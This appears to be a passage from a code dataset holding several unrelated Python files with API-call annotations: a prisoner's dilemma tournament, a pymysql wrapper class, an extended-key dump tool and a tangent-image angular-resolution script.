node]'], {'axis': '(0)'}), '(self.yout[..., ndof * node], axis=0)\n', (34944, 34981), True, 'import numpy as np\n'), ((35001, 35049), 'numpy.mean', 'np.mean', (['self.yout[..., ndof * node + 1]'], {'axis': '(0)'}), '(self.yout[..., ndof * node + 1], axis=0)\n', (35008, 35049), True, 'import numpy as np\n'), ((46098, 46141), 'numpy.vstack', 'np.vstack', (['(mag[:, (dofx)], mag[:, (dofy)])'], {}), '((mag[:, (dofx)], mag[:, (dofy)]))\n', (46107, 46141), True, 'import numpy as np\n'), ((55069, 55112), 'numpy.vstack', 'np.vstack', (['(mag[:, (dofx)], mag[:, (dofy)])'], {}), '((mag[:, (dofx)], mag[:, (dofy)]))\n', (55078, 55112), True, 'import numpy as np\n'), ((3383, 3410), 'numpy.mean', 'np.mean', (['self.wd[j]'], {'axis': '(1)'}), '(self.wd[j], axis=1)\n', (3390, 3410), True, 'import numpy as np\n'), ((7732, 7764), 'numpy.mean', 'np.mean', (['self.log_dec[j]'], {'axis': '(1)'}), '(self.log_dec[j], axis=1)\n', (7739, 7764), True, 'import numpy as np\n'), ((15518, 15558), 'numpy.percentile', 'np.percentile', (['self.magnitude', 'p'], {'axis': '(1)'}), '(self.magnitude, p, axis=1)\n', (15531, 15558), True, 'import numpy as np\n'), ((16268, 16298), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (16282, 16298), True, 'import numpy as np\n'), ((19412, 19448), 'numpy.percentile', 'np.percentile', (['self.phase', 'p'], {'axis': '(1)'}), '(self.phase, p, axis=1)\n', (19425, 19448), True, 'import numpy as np\n'), ((20146, 20176), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (20160, 20176), True, 'import numpy as np\n'), ((23537, 23577), 'numpy.percentile', 'np.percentile', (['self.magnitude', 'p'], {'axis': '(1)'}), '(self.magnitude, p, axis=1)\n', (23550, 23577), True, 'import numpy as np\n'), ((23605, 23641), 'numpy.percentile', 'np.percentile', (['self.phase', 'p'], {'axis': '(1)'}), '(self.phase, p, axis=1)\n', (23618, 23641), True, 'import numpy as np\n'), ((24627, 24657), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (24641, 24657), True, 'import numpy as np\n'), ((24685, 24715), 'numpy.concatenate', 'np.concatenate', (['(p3, p4[::-1])'], {}), '((p3, p4[::-1]))\n', (24699, 24715), True, 'import numpy as np\n'), ((31061, 31074), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (31067, 31074), True, 'import numpy as np\n'), ((31112, 31125), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (31118, 31125), True, 'import numpy as np\n'), ((31647, 31674), 'numpy.mean', 'np.mean', (['probe_resp'], {'axis': '(0)'}), '(probe_resp, axis=0)\n', (31654, 31674), True, 'import numpy as np\n'), ((35459, 35512), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node]', 'p'], {'axis': '(0)'}), '(self.yout[..., ndof * node], p, axis=0)\n', (35472, 35512), True, 'import numpy as np\n'), ((35536, 35593), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * node + 1]', 'p'], {'axis': '(0)'}), '(self.yout[..., ndof * node + 1], p, axis=0)\n', (35549, 35593), True, 'import numpy as np\n'), ((36397, 36427), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (36411, 36427), True, 'import numpy as np\n'), ((36451, 36481), 'numpy.concatenate', 'np.concatenate', (['(p3, p4[::-1])'], {}), '((p3, p4[::-1]))\n', (36465, 36481), True, 'import numpy as np\n'), ((39038, 39079), 'numpy.mean', 'np.mean', (['self.yout[..., ndof * n]'], {'axis': '(0)'}), '(self.yout[..., ndof * n], axis=0)\n', (39045, 39079), True, 'import numpy as np\n'), ((39103, 
39148), 'numpy.mean', 'np.mean', (['self.yout[..., ndof * n + 1]'], {'axis': '(0)'}), '(self.yout[..., ndof * n + 1], axis=0)\n', (39110, 39148), True, 'import numpy as np\n'), ((45841, 45854), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (45847, 45854), True, 'import numpy as np\n'), ((45892, 45905), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (45898, 45905), True, 'import numpy as np\n'), ((46441, 46468), 'numpy.mean', 'np.mean', (['probe_resp'], {'axis': '(0)'}), '(probe_resp, axis=0)\n', (46448, 46468), True, 'import numpy as np\n'), ((50602, 50630), 'numpy.mean', 'np.mean', (['probe_phase'], {'axis': '(0)'}), '(probe_phase, axis=0)\n', (50609, 50630), True, 'import numpy as np\n'), ((54812, 54825), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (54818, 54825), True, 'import numpy as np\n'), ((54863, 54876), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (54869, 54876), True, 'import numpy as np\n'), ((55760, 55787), 'numpy.mean', 'np.mean', (['probe_resp'], {'axis': '(0)'}), '(probe_resp, axis=0)\n', (55767, 55787), True, 'import numpy as np\n'), ((55815, 55843), 'numpy.mean', 'np.mean', (['probe_phase'], {'axis': '(0)'}), '(probe_phase, axis=0)\n', (55822, 55843), True, 'import numpy as np\n'), ((3941, 3977), 'numpy.percentile', 'np.percentile', (['self.wd[j]', 'p'], {'axis': '(1)'}), '(self.wd[j], p, axis=1)\n', (3954, 3977), True, 'import numpy as np\n'), ((4726, 4756), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (4740, 4756), True, 'import numpy as np\n'), ((8294, 8335), 'numpy.percentile', 'np.percentile', (['self.log_dec[j]', 'p'], {'axis': '(1)'}), '(self.log_dec[j], p, axis=1)\n', (8307, 8335), True, 'import numpy as np\n'), ((8992, 9022), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (9006, 9022), True, 'import numpy as np\n'), ((31078, 31091), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (31084, 31091), True, 'import numpy as np\n'), ((31129, 31142), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (31135, 31142), True, 'import numpy as np\n'), ((31413, 31426), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (31419, 31426), True, 'import numpy as np\n'), ((31471, 31484), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (31477, 31484), True, 'import numpy as np\n'), ((32124, 32160), 'numpy.percentile', 'np.percentile', (['probe_resp', 'p'], {'axis': '(0)'}), '(probe_resp, p, axis=0)\n', (32137, 32160), True, 'import numpy as np\n'), ((32847, 32877), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (32861, 32877), True, 'import numpy as np\n'), ((39787, 39837), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n]', 'p'], {'axis': '(0)'}), '(self.yout[..., ndof * n], p, axis=0)\n', (39800, 39837), True, 'import numpy as np\n'), ((39865, 39919), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n + 1]', 'p'], {'axis': '(0)'}), '(self.yout[..., ndof * n + 1], p, axis=0)\n', (39878, 39919), True, 'import numpy as np\n'), ((40682, 40741), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n]', '(50 + p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * n], 50 + p / 2, axis=0)\n', (40695, 40741), True, 'import numpy as np\n'), ((40769, 40832), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n + 1]', '(50 + p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * n + 1], 50 + p / 2, axis=0)\n', (40782, 40832), True, 'import numpy as np\n'), ((41619, 41678), 
'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n]', '(50 - p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * n], 50 - p / 2, axis=0)\n', (41632, 41678), True, 'import numpy as np\n'), ((41706, 41769), 'numpy.percentile', 'np.percentile', (['self.yout[..., ndof * n + 1]', '(50 - p / 2)'], {'axis': '(0)'}), '(self.yout[..., ndof * n + 1], 50 - p / 2, axis=0)\n', (41719, 41769), True, 'import numpy as np\n'), ((45858, 45871), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (45864, 45871), True, 'import numpy as np\n'), ((45909, 45922), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (45915, 45922), True, 'import numpy as np\n'), ((47011, 47047), 'numpy.percentile', 'np.percentile', (['probe_resp', 'p'], {'axis': '(0)'}), '(probe_resp, p, axis=0)\n', (47024, 47047), True, 'import numpy as np\n'), ((47872, 47902), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (47886, 47902), True, 'import numpy as np\n'), ((51169, 51206), 'numpy.percentile', 'np.percentile', (['probe_phase', 'p'], {'axis': '(0)'}), '(probe_phase, p, axis=0)\n', (51182, 51206), True, 'import numpy as np\n'), ((52029, 52059), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (52043, 52059), True, 'import numpy as np\n'), ((54829, 54842), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (54835, 54842), True, 'import numpy as np\n'), ((54880, 54893), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (54886, 54893), True, 'import numpy as np\n'), ((56565, 56601), 'numpy.percentile', 'np.percentile', (['probe_resp', 'p'], {'axis': '(0)'}), '(probe_resp, p, axis=0)\n', (56578, 56601), True, 'import numpy as np\n'), ((56633, 56670), 'numpy.percentile', 'np.percentile', (['probe_phase', 'p'], {'axis': '(0)'}), '(probe_phase, p, axis=0)\n', (56646, 56670), True, 'import numpy as np\n'), ((57760, 57790), 'numpy.concatenate', 'np.concatenate', (['(p1, p2[::-1])'], {}), '((p1, p2[::-1]))\n', (57774, 57790), True, 'import numpy as np\n'), ((57822, 57852), 'numpy.concatenate', 'np.concatenate', (['(p3, p4[::-1])'], {}), '((p3, p4[::-1]))\n', (57836, 57852), True, 'import numpy as np\n'), ((46196, 46209), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (46202, 46209), True, 'import numpy as np\n'), ((46276, 46289), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (46282, 46289), True, 'import numpy as np\n'), ((55167, 55180), 'numpy.cos', 'np.cos', (['angle'], {}), '(angle)\n', (55173, 55180), True, 'import numpy as np\n'), ((55247, 55260), 'numpy.sin', 'np.sin', (['angle'], {}), '(angle)\n', (55253, 55260), True, 'import numpy as np\n')]
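The plot method in the content above composes standalone Plotly figures into a single subplot grid by re-adding their traces. A minimal, hypothetical sketch of that composition pattern follows; the sample data, trace names, and axis titles are invented for illustration, and only the generic plotly/numpy APIs are assumed:

import numpy as np
from plotly import graph_objects as go
from plotly.subplots import make_subplots

# Build two standalone figures, analogous to the fig0/fig1 returned by the
# plot_magnitude()/plot_phase() helpers in the file above.
x = np.linspace(0.0, 10.0, 200)
fig_mag = go.Figure(go.Scatter(x=x, y=np.abs(np.sin(x)), name="magnitude"))
fig_phase = go.Figure(go.Scatter(x=x, y=np.cos(x), name="phase"))

# Re-add their traces to a shared 2x1 grid, hiding duplicate legend entries.
fig = make_subplots(rows=2, cols=1, shared_xaxes=True)
for data in fig_mag["data"]:
    data.showlegend = False
    fig.add_trace(data, row=1, col=1)
for data in fig_phase["data"]:
    data.showlegend = False
    fig.add_trace(data, row=2, col=1)
fig.update_yaxes(title_text="amplitude", row=1, col=1)
fig.update_yaxes(title_text="phase", row=2, col=1)
fig.update_xaxes(title_text="frequency", row=2, col=1)
# fig.show()  # uncomment to render interactively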
ben9583/PrisonersDilemmaTournament
code/prisonersDilemma.py
8227c05f835c93a0b30feb4207a7d7c631e670a0
import os import itertools import importlib import numpy as np import random STRATEGY_FOLDER = "exampleStrats" RESULTS_FILE = "results.txt" pointsArray = [[1,5],[0,3]] # The i-j-th element of this array is how many points you receive if you do play i, and your opponent does play j. moveLabels = ["D","C"] # D = defect, betray, sabotage, free-ride, etc. # C = cooperate, stay silent, comply, upload files, etc. # Returns a 2-by-n numpy array. The first axis is which player (0 = us, 1 = opponent) # The second axis is which turn. (0 = first turn, 1 = next turn, etc. # For example, it might return # # [[0 0 1] a.k.a. D D C # [1 1 1]] a.k.a. C C C # # if there have been 3 turns, and we have defected twice then cooperated once, # and our opponent has cooperated all three times. def getVisibleHistory(history, player, turn): historySoFar = history[:,:turn].copy() if player == 1: historySoFar = np.flip(historySoFar,0) return historySoFar def runRound(pair): moduleA = importlib.import_module(STRATEGY_FOLDER+"."+pair[0]) moduleB = importlib.import_module(STRATEGY_FOLDER+"."+pair[1]) memoryA = None memoryB = None LENGTH_OF_GAME = int(200-40*np.log(random.random())) # The games are a minimum of 50 turns long. The np.log here guarantees that every turn after the 50th has an equal (low) chance of being the final turn. history = np.zeros((2,LENGTH_OF_GAME),dtype=int) for turn in range(LENGTH_OF_GAME): playerAmove, memoryA = moduleA.strategy(getVisibleHistory(history,0,turn),memoryA) playerBmove, memoryB = moduleB.strategy(getVisibleHistory(history,1,turn),memoryB) history[0,turn] = playerAmove history[1,turn] = playerBmove return history def tallyRoundScores(history): scoreA = 0 scoreB = 0 ROUND_LENGTH = history.shape[1] for turn in range(ROUND_LENGTH): playerAmove = history[0,turn] playerBmove = history[1,turn] scoreA += pointsArray[playerAmove][playerBmove] scoreB += pointsArray[playerBmove][playerAmove] return scoreA/ROUND_LENGTH, scoreB/ROUND_LENGTH def outputRoundResults(f, pair, roundHistory, scoresA, scoresB): f.write(pair[0]+" (P1) VS. "+pair[1]+" (P2)\n") for p in range(2): for t in range(roundHistory.shape[1]): move = roundHistory[p,t] f.write(moveLabels[move]+" ") f.write("\n") f.write("Final score for "+pair[0]+": "+str(scoresA)+"\n") f.write("Final score for "+pair[1]+": "+str(scoresB)+"\n") f.write("\n") def pad(stri, leng): result = stri for i in range(len(stri),leng): result = result+" " return result def runFullPairingTournament(inFolder, outFile): print("Starting tournament, reading files from "+inFolder) scoreKeeper = {} STRATEGY_LIST = [] for file in os.listdir(inFolder): if file.endswith(".py"): STRATEGY_LIST.append(file[:-3]) for strategy in STRATEGY_LIST: scoreKeeper[strategy] = 0 f = open(outFile,"w+") for pair in itertools.combinations(STRATEGY_LIST, r=2): roundHistory = runRound(pair) scoresA, scoresB = tallyRoundScores(roundHistory) outputRoundResults(f, pair, roundHistory, scoresA, scoresB) scoreKeeper[pair[0]] += scoresA scoreKeeper[pair[1]] += scoresB scoresNumpy = np.zeros(len(scoreKeeper)) for i in range(len(STRATEGY_LIST)): scoresNumpy[i] = scoreKeeper[STRATEGY_LIST[i]] rankings = np.argsort(scoresNumpy) f.write("\n\nTOTAL SCORES\n") for rank in range(len(STRATEGY_LIST)): i = rankings[-1-rank] score = scoresNumpy[i] scorePer = score/(len(STRATEGY_LIST)-1) f.write("#"+str(rank+1)+": "+pad(STRATEGY_LIST[i]+":",16)+' %.3f'%score+' (%.3f'%scorePer+" average)\n") f.flush() f.close() print("Done with everything! 
Results file written to "+RESULTS_FILE) runFullPairingTournament(STRATEGY_FOLDER, RESULTS_FILE)
[((1069, 1125), 'importlib.import_module', 'importlib.import_module', (["(STRATEGY_FOLDER + '.' + pair[0])"], {}), "(STRATEGY_FOLDER + '.' + pair[0])\n", (1092, 1125), False, 'import importlib\n'), ((1137, 1193), 'importlib.import_module', 'importlib.import_module', (["(STRATEGY_FOLDER + '.' + pair[1])"], {}), "(STRATEGY_FOLDER + '.' + pair[1])\n", (1160, 1193), False, 'import importlib\n'), ((1462, 1502), 'numpy.zeros', 'np.zeros', (['(2, LENGTH_OF_GAME)'], {'dtype': 'int'}), '((2, LENGTH_OF_GAME), dtype=int)\n', (1470, 1502), True, 'import numpy as np\n'), ((2994, 3014), 'os.listdir', 'os.listdir', (['inFolder'], {}), '(inFolder)\n', (3004, 3014), False, 'import os\n'), ((3249, 3291), 'itertools.combinations', 'itertools.combinations', (['STRATEGY_LIST'], {'r': '(2)'}), '(STRATEGY_LIST, r=2)\n', (3271, 3291), False, 'import itertools\n'), ((3711, 3734), 'numpy.argsort', 'np.argsort', (['scoresNumpy'], {}), '(scoresNumpy)\n', (3721, 3734), True, 'import numpy as np\n'), ((982, 1006), 'numpy.flip', 'np.flip', (['historySoFar', '(0)'], {}), '(historySoFar, 0)\n', (989, 1006), True, 'import numpy as np\n'), ((1276, 1291), 'random.random', 'random.random', ([], {}), '()\n', (1289, 1291), False, 'import random\n')]
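The tournament in the content above imports every .py file in STRATEGY_FOLDER and calls its strategy(history, memory) function once per turn, expecting a (move, memory) pair back, where move is 0 (defect) or 1 (cooperate) and history is a 2-by-n numpy array holding the player's own moves in row 0 and the opponent's moves in row 1. A hypothetical strategy module in that shape (the file name and tactic are illustrative, not taken from the repository):

# exampleStrats/mirror.py (hypothetical file name)
def strategy(history, memory):
    # history.shape[1] is the number of turns played so far.
    if history.shape[1] == 0:
        return 1, None  # cooperate on the first turn
    return history[1, -1], None  # afterwards, copy the opponent's previous move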
paepcke/json_to_relation
json_to_relation/mysqldb.py
acfa58d540f8f51d1d913d0c173ee3ded1b6c2a9
# Copyright (c) 2014, Stanford University # All rights reserved. # # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. # 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' Created on Sep 24, 2013 @author: paepcke Modifications: - Dec 30, 2013: Added closing of connection to close() method ''' import re import subprocess import tempfile import pymysql #import MySQLdb class MySQLDB(object): ''' Shallow interface to MySQL databases. Some niceties nonetheless. The query() method is an iterator. So:: for result in mySqlObj.query('SELECT * FROM foo'): print result ''' def __init__(self, host='127.0.0.1', port=3306, user='root', passwd='', db='mysql'): ''' :param host: MySQL host :type host: string :param port: MySQL host's port :type port: int :param user: user to log in as :type user: string :param passwd: password to use for given user :type passwd: string :param db: database to connect to within server :type db: string ''' # If all arguments are set to None, we are unittesting: if all(arg is None for arg in (host,port,user,passwd,db)): return self.user = user self.pwd = passwd self.db = db self.cursors = [] try: self.connection = pymysql.connect(host=host, port=port, user=user, passwd=passwd, db=db) #self.connection = MySQLdb.connect(host=host, port=port, user=user, passwd=passwd, db=db, local_infile=1) #except MySQLdb.OperationalError: except pymysql.OperationalError: pwd = '...............' if len(passwd) > 0 else '<no password>' raise ValueError('Cannot reach MySQL server with host:%s, port:%s, user:%s, pwd:%s, db:%s' % (host, port, user, pwd, db)) def close(self): ''' Close all cursors that are currently still open. ''' for cursor in self.cursors: try: cursor.close() except: pass try: self.connection.close() except: pass def createTable(self, tableName, schema): ''' Create new table, given its name, and schema. The schema is a dict mappingt column names to column types. 
Example: {'col1' : 'INT', 'col2' : 'TEXT'} :param tableName: name of new table :type tableName: String :param schema: dictionary mapping column names to column types :type schema: Dict<String,String> ''' colSpec = '' for colName, colVal in schema.items(): colSpec += str(colName) + ' ' + str(colVal) + ',' cmd = 'CREATE TABLE IF NOT EXISTS %s (%s) ' % (tableName, colSpec[:-1]) cursor = self.connection.cursor() try: cursor.execute(cmd) self.connection.commit() finally: cursor.close() def dropTable(self, tableName): ''' Delete table safely. No errors :param tableName: name of table :type tableName: String ''' cursor = self.connection.cursor() try: cursor.execute('DROP TABLE IF EXISTS %s' % tableName) self.connection.commit() finally: cursor.close() def truncateTable(self, tableName): ''' Delete all table rows. No errors :param tableName: name of table :type tableName: String ''' cursor = self.connection.cursor() try: cursor.execute('TRUNCATE TABLE %s' % tableName) self.connection.commit() finally: cursor.close() def insert(self, tblName, colnameValueDict): ''' Given a dictionary mapping column names to column values, insert the data into a specified table :param tblName: name of table to insert into :type tblName: String :param colnameValueDict: mapping of column name to column value :type colnameValueDict: Dict<String,Any> ''' colNames, colValues = zip(*colnameValueDict.items()) cursor = self.connection.cursor() try: cmd = 'INSERT INTO %s (%s) VALUES (%s)' % (str(tblName), ','.join(colNames), self.ensureSQLTyping(colValues)) cursor.execute(cmd) self.connection.commit() finally: cursor.close() def bulkInsert(self, tblName, colNameTuple, valueTupleArray): ''' Inserts large number of rows into given table. Strategy: write the values to a temp file, then generate a LOAD INFILE LOCAL MySQL command. Execute that command via subprocess.call(). Using a cursor.execute() fails with error 'LOAD DATA LOCAL is not supported in this MySQL version...' even though MySQL is set up to allow the op (load-infile=1 for both mysql and mysqld in my.cnf). :param tblName: table into which to insert :type tblName: string :param colNameTuple: tuple containing column names in proper order, i.e. \ corresponding to valueTupleArray orders. :type colNameTuple: (str[,str[...]]) :param valueTupleArray: array of n-tuples, which hold the values. Order of\ values must corresond to order of column names in colNameTuple. :type valueTupleArray: [(<anyMySQLCompatibleTypes>[<anyMySQLCompatibleTypes,...]]) ''' tmpCSVFile = tempfile.NamedTemporaryFile(dir='/tmp',prefix='userCountryTmp',suffix='.csv') for valueTuple in valueTupleArray: tmpCSVFile.write(','.join(valueTuple) + '\n') try: # Remove quotes from the values inside the colNameTuple's: mySQLColNameList = re.sub("'","",str(colNameTuple)) mySQLCmd = "USE %s; LOAD DATA LOCAL INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\"' LINES TERMINATED BY '\\n' %s" %\ (self.db, tmpCSVFile.name, tblName, mySQLColNameList) subprocess.call(['mysql', '-u', self.user, '-p%s'%self.pwd, '-e', mySQLCmd]) finally: tmpCSVFile.close() def update(self, tblName, colName, newVal, fromCondition=None): ''' Update one column with a new value. 
:param tblName: name of table in which update is to occur :type tblName: String :param colName: column whose value is to be changed :type colName: String :param newVal: value acceptable to MySQL for the given column :type newVal: type acceptable to MySQL for the given column :param fromCondition: optionally condition that selects which rows to update.\ if None, the named column in all rows are updated to\ the given value. Syntax must conform to what may be in\ a MySQL FROM clause (don't include the 'FROM' keyword) :type fromCondition: String ''' cursor = self.connection.cursor() try: if fromCondition is None: cmd = "UPDATE %s SET %s = '%s';" % (tblName,colName,newVal) else: cmd = "UPDATE %s SET %s = '%s' WHERE %s;" % (tblName,colName,newVal,fromCondition) cursor.execute(cmd) self.connection.commit() finally: cursor.close() def ensureSQLTyping(self, colVals): ''' Given a list of items, return a string that preserves MySQL typing. Example: (10, 'My Poem') ---> '10, "My Poem"' Note that ','.join(map(str,myList)) won't work: (10, 'My Poem') ---> '10, My Poem' :param colVals: list of column values destined for a MySQL table :type colVals: <any> ''' resList = [] for el in colVals: if isinstance(el, basestring): resList.append('"%s"' % el) else: resList.append(el) return ','.join(map(str,resList)) def query(self, queryStr): ''' Query iterator. Given a query, return one result for each subsequent call. :param queryStr: query :type queryStr: String ''' cursor = self.connection.cursor() # For if caller never exhausts the results by repeated calls: self.cursors.append(cursor) cursor.execute(queryStr) while True: nextRes = cursor.fetchone() if nextRes is None: cursor.close() return yield nextRes
[((6940, 7019), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'dir': '"""/tmp"""', 'prefix': '"""userCountryTmp"""', 'suffix': '""".csv"""'}), "(dir='/tmp', prefix='userCountryTmp', suffix='.csv')\n", (6967, 7019), False, 'import tempfile\n'), ((2736, 2806), 'pymysql.connect', 'pymysql.connect', ([], {'host': 'host', 'port': 'port', 'user': 'user', 'passwd': 'passwd', 'db': 'db'}), '(host=host, port=port, user=user, passwd=passwd, db=db)\n', (2751, 2806), False, 'import pymysql\n'), ((7515, 7593), 'subprocess.call', 'subprocess.call', (["['mysql', '-u', self.user, '-p%s' % self.pwd, '-e', mySQLCmd]"], {}), "(['mysql', '-u', self.user, '-p%s' % self.pwd, '-e', mySQLCmd])\n", (7530, 7593), False, 'import subprocess\n')]
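A hedged usage sketch for the MySQLDB wrapper in the content above; the import path, connection parameters, table name, and column values are assumptions for illustration, and a reachable MySQL server is required:

from json_to_relation.mysqldb import MySQLDB  # assumed import path

db = MySQLDB(host='127.0.0.1', port=3306, user='root', passwd='', db='test')
try:
    db.createTable('events', {'id': 'INT', 'name': 'TEXT'})
    db.insert('events', {'id': 1, 'name': 'started'})
    db.update('events', 'name', 'finished', fromCondition='id = 1')
    for row in db.query('SELECT id, name FROM events'):
        print(row)
finally:
    db.close()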
treys/crypto-key-derivation
tools/xkeydump.py
789900bd73160db9a0d406c7c7f00f5f299aff73
#!./venv/bin/python
# Read one extended key (a BIP32-style xprv/xpub string) from stdin and dump its fields.

from lib.mbp32 import XKey
from lib.utils import one_line_from_stdin

xkey = XKey.from_xkey(one_line_from_stdin())
print(xkey)
print("Version:", xkey.version)
print("Depth:", xkey.depth)
print("Parent FP:", xkey.parent_fp.hex())
print("Child number:", xkey.child_number_with_tick())
print("Chain code:", xkey.chain_code.hex())
print("Key:", xkey.key)
if xkey.key.get_private_bytes():
    print("Private bytes:", xkey.key.get_private_bytes().hex())
print("Public bytes:", xkey.key.get_public_bytes().hex())
print("Key ID:", xkey.keyid().hex())
print("XKey:", xkey.to_xkey().decode('ascii'))
[((113, 134), 'lib.utils.one_line_from_stdin', 'one_line_from_stdin', ([], {}), '()\n', (132, 134), False, 'from lib.utils import one_line_from_stdin\n')]
meder411/Tangent-Images
examples/compute_angular_resolution.py
6def4d7b8797110e54f7faa2435973771d9e9722
from spherical_distortion.util import *

sample_order = 9 # Input resolution to examine

def ang_fov(s):
    # For each base level b, report each tangent image's field of view and the
    # resulting angular resolution (degrees per pixel) at spherical resolution s.
    print('Spherical Resolution:', s)
    for b in range(s):
        dim = tangent_image_dim(b, s) # Pixel dimension of tangent image
        corners = tangent_image_corners(b, s) # Corners of each tangent image
        fov_x, fov_y = compute_tangent_image_angular_resolution(corners)
        print(' At base level', b)
        print(' FOV (x) =', fov_x)
        print(' FOV (y) =', fov_y)
        print(' deg/pix (x) =', fov_x/dim)
        print(' deg/pix (y) =', fov_y/dim)

ang_fov(sample_order)
[]